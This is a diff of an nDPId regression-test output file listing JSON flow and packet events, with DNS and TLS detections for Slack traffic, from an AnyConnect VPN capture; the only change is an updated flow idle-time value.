+00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1569687247306,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":129,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":129,"pkt_l4_len":95,"thread_ts_msec":1569687247306,"pkt":"LH6BsEqhNDY7z3UoCABFAABzAABAAEAGB9AKAADjNCXzrd5SAbt7aDM3a\/IufIAYEAAjBQAAAQEIChwNgekCYGB5FwMDADoAAAAAAAAABP6P4Nbq7ON\/6\/AGxu6nGVDbyH\/VD4ZdKbxLWPLfwYcNeZogzNp7TOtgIRax\/b1ZBFBO"} +00561{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1569687247306,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":129,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":129,"pkt_l4_len":95,"thread_ts_msec":1569687247306,"pkt":"LH6BsEqhNDY7z3UoCABFAABzAABAAEAGB9AKAADjNCXzrd5TAbsf\/fAfcO3V5YAYEADtVwAAAQEIChwNgekAjYToFwMDADoAAAAAAAAABVQHVjyN4wBxs8m+2i54okht8UdFndDP4vwtKiUe9j1LvsBOOnvld8r5j6XDOjeRQG2g"} 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":111,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687247596,"flow_last_seen":1569687247596,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1569687247596,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1569687247596,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"thread_ts_msec":1569687247596,"pkt":"MzMAAAAWGIEORo7Iht1gAAAAACQAAf6AAAAAAAAABAg+RTq8FVL\/AgAAAAAAAAAAAAAAAAAWOgABAAUCAACPANy0AAAAAQQAAAD\/AgAAAAAAAAAAAAAAAAD7"} 00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687247596,"flow_last_seen":1569687247596,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1569687247596,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} @@ -96,12 +96,12 @@ 00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1569687248005,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":186,"pkt_l4_len":152,"thread_ts_msec":1569687248005,"pkt":"AQBeAAD7GIEORo7ICABFAACszwUAAP8RAGsKAADV4AAA+xTpFOkAmDTQAAAAAAADAAEAAAABD19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMAAEIX2hvbWVraXTAHAAMAAEMX3NsZWVwLXByb3h5BF91ZHDAIQAMAAHADAAMAAEAAA4QABQRTFAtUktFUlVSLU9TWCAoOSnADAAAKQWgAAARlAASAAQADgCaOoEORo7IGIEORo7I"} 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1569687248006,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":206,"pkt_l4_len":152,"thread_ts_msec":1569687248006,"pkt":"MzMAAAD7GIEORo7Iht1gBoi5AJgR\/\/6AAAAAAAAABAg+RTq8FVL\/AgAAAAAAAAAAAAAAAAD7FOkU6QCYj8YAAAAAAAMAAQAAAAEPX2NvbXBhbmlvbi1saW5rBF90Y3AFbG9jYWwAAAwAAQhfaG9tZWtpdMAcAAwAAQxfc2xlZXAtcHJveHkEX3VkcMAhAAwAAcAMAAwAAQAADhAAFBFMUC1SS0VSVVItT1NYICg5KcAMAAApBaAAABGUABIABAAOAJo6gQ5GjsgYgQ5Gjsg="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1569687248620,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"thread_ts_msec":1569687248620,"pkt":"MzMAAAAWGIEORo7Iht1gAAAAACQAAf6AAAAAAAAABAg+RTq8FVL\/AgAAAAAAAAAAAAAAAAAWOgABAAUCAACPANy0AAAAAQQAAAD\/AgAAAAAAAAAAAAAAAAD7"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":116,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687249612,"flow_last_seen":1569687249612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687249612,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56917,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1569687249612,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569687249612,"pkt":"LH6BsEqhNDY7z3UoCABFAAAoT2EAAEAGMCYKAADjuBk4Td5VAFBor5ytCT1EPVAQEAlzBQAA"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":117,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687249612,"flow_last_seen":1569687249612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687249612,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1569687249612,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569687249612,"pkt":"LH6BsEqhNDY7z3UoCABFAAAogHcAAEAG\/w8KAADjuBk4Td40AFBjyKiAGk9l7lAQEAA5gAAA"} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1569687249631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687249631,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0NJhAADcGE+O4GThNCgAA4wBQ3jQaT2XuY8iogYAQAPO0OwAAAQEICuMU+IIcDWOU"} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1569687249631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687249631,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0uJpAADgGjuC4GThNCgAA4wBQ3lUJPUQ9aK+croAQAOvt6gAAAQEICuMU+IIcDWN7"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":116,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687249612,"flow_last_seen":1569687249612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687249612,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56917,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1569687249612,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569687249612,"pkt":"LH6BsEqhNDY7z3UoCABFAAAoT2EAAEAGMCYKAADjuBk4Td5VAFBor5ytCT1EPVAQEAlzBQAA"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":117,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687249612,"flow_last_seen":1569687249612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687249612,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1569687249612,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569687249612,"pkt":"LH6BsEqhNDY7z3UoCABFAAAogHcAAEAG\/w8KAADjuBk4Td40AFBjyKiAGk9l7lAQEAA5gAAA"} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1569687249631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687249631,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0NJhAADcGE+O4GThNCgAA4wBQ3jQaT2XuY8iogYAQAPO0OwAAAQEICuMU+IIcDWOU"} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1569687249631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687249631,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0uJpAADgGjuC4GThNCgAA4wBQ3lUJPUQ9aK+croAQAOvt6gAAAQEICuMU+IIcDWN7"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687251177,"flow_last_seen":1569687251177,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1569687251177,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":54851,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1569687251177,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1569687251177,"pkt":"LH6BsEqhNDY7z3UoCABFAAA+HQ0AAP8R\/CcKAADjS0tMTNZDADUAKtGSphcBAAABAAAAAAAABXByaW50BnZpYXNhdANjb20AAAEAAQ=="} 00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687251177,"flow_last_seen":1569687251177,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1569687251177,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":54851,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"print.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} @@ -112,29 +112,29 @@ 00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687255989,"flow_last_seen":1569687255989,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1569687255989,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":58155,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Slack","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"slack.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1569687256018,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1569687256018,"pkt":"NDY7z3UoLH6BsEqhCABFAABHAABAADcRoSxLS0xMCgAA4wA14ysAM\/asjyeBgAABAAEAAAAABXNsYWNrA2NvbQAAAQABwAwAAQABAAAAIwAEY1YinA=="} 00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":128,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687255989,"flow_last_seen":1569687256018,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1569687256018,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":58155,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Slack","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"slack.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"99.86.34.156"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":129,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687256018,"flow_last_seen":1569687256018,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687256018,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":129,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1569687256018,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687256018,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGqeMKAADjY1YinN5YAbvhhxKGAAAAALAC\/\/8SKwAAAgQFtAEDAwUBAQgKHA2jzgAAAAAEAgAA"} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1569687256050,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569687256050,"pkt":"NDY7z3UoLH6BsEqhCABFAAA8AABAAO4G++ZjViKcCgAA4wG73lg6Ai8I4YcSh6AScSDdlgAAAgQFtAQCCApVvxWbHA2jzgEDAwg="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1569687256050,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687256050,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGqe8KAADjY1YinN5YAbvhhxKHOgIvCYAQEBVtUAAAAQEIChwNo+1VvxWb"} -00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687256018,"flow_last_seen":1569687256050,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569687256050,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Slack","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"slack.com","ja3":"d8dc5f8940df366b3a58b935569143e8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00910{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":134,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687256018,"flow_last_seen":1569687256093,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1569687256093,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Slack","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"slack.com","ja3":"d8dc5f8940df366b3a58b935569143e8","ja3s":"7bee5c1d424b7e5f943b06983bb11422","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":129,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687256018,"flow_last_seen":1569687256018,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687256018,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":129,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1569687256018,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687256018,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGqeMKAADjY1YinN5YAbvhhxKGAAAAALAC\/\/8SKwAAAgQFtAEDAwUBAQgKHA2jzgAAAAAEAgAA"} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1569687256050,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569687256050,"pkt":"NDY7z3UoLH6BsEqhCABFAAA8AABAAO4G++ZjViKcCgAA4wG73lg6Ai8I4YcSh6AScSDdlgAAAgQFtAQCCApVvxWbHA2jzgEDAwg="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1569687256050,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687256050,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGqe8KAADjY1YinN5YAbvhhxKHOgIvCYAQEBVtUAAAAQEIChwNo+1VvxWb"} +00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687256018,"flow_last_seen":1569687256050,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569687256050,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Slack","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"slack.com","ja3":"d8dc5f8940df366b3a58b935569143e8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00910{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":134,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687256018,"flow_last_seen":1569687256093,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1569687256093,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Slack","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"slack.com","ja3":"d8dc5f8940df366b3a58b935569143e8","ja3s":"7bee5c1d424b7e5f943b06983bb11422","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 00596{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1569687259269,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":1569687259269,"pkt":"AQBeAAD7GIEORo7ICABFAACMyOAAAP8RBrAKAADV4AAA+xTpFOkAeGDGAAAAAAADAAAAAAABD19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMgAEIX2hvbWVraXTAHAAMgAEMX3NsZWVwLXByb3h5BF91ZHDAIQAMgAEAACkFoAAAEZQAEgAEAA4AmzqBDkaOyBiBDkaOyA=="} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1569687259270,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":174,"pkt_l4_len":120,"thread_ts_msec":1569687259270,"pkt":"MzMAAAD7GIEORo7Iht1gBoi5AHgR\/\/6AAAAAAAAABAg+RTq8FVL\/AgAAAAAAAAAAAAAAAAD7FOkU6QB4u7wAAAAAAAMAAAAAAAEPX2NvbXBhbmlvbi1saW5rBF90Y3AFbG9jYWwAAAyAAQhfaG9tZWtpdMAcAAyAAQxfc2xlZXAtcHJveHkEX3VkcMAhAAyAAQAAKQWgAAARlAASAAQADgCbOoEORo7IGIEORo7I"} 00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1569687259297,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":274,"pkt_l4_len":240,"thread_ts_msec":1569687259297,"pkt":"GIEORo7INDY7z3UoCABFAAEEsFAAAP8R9OAKAADjCgAA1RTpFOkA8ADKAACEAAAAAAEAAAAED19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMAAEAABGUABQRTFAtUktFUlVSLU9TWCAoOSnADMAyACGAAQAAAHgADQAAAADbaQRuRFBJwCHAMgAQgAEAABGUACIWcnBCQT0zNzoyRTo0Nzo2RDoxODo1NApycFZyPTE1Mi4xEUxQLVJLRVJVUi1PU1ggKDkpDF9kZXZpY2UtaW5mb8AcABAAAQAAEZQAIBRtb2RlbD1NYWNCb29rUHJvMTEsMQpvc3h2ZXJzPTE3wFgAAYABAAAAeAAECgAA4w=="} 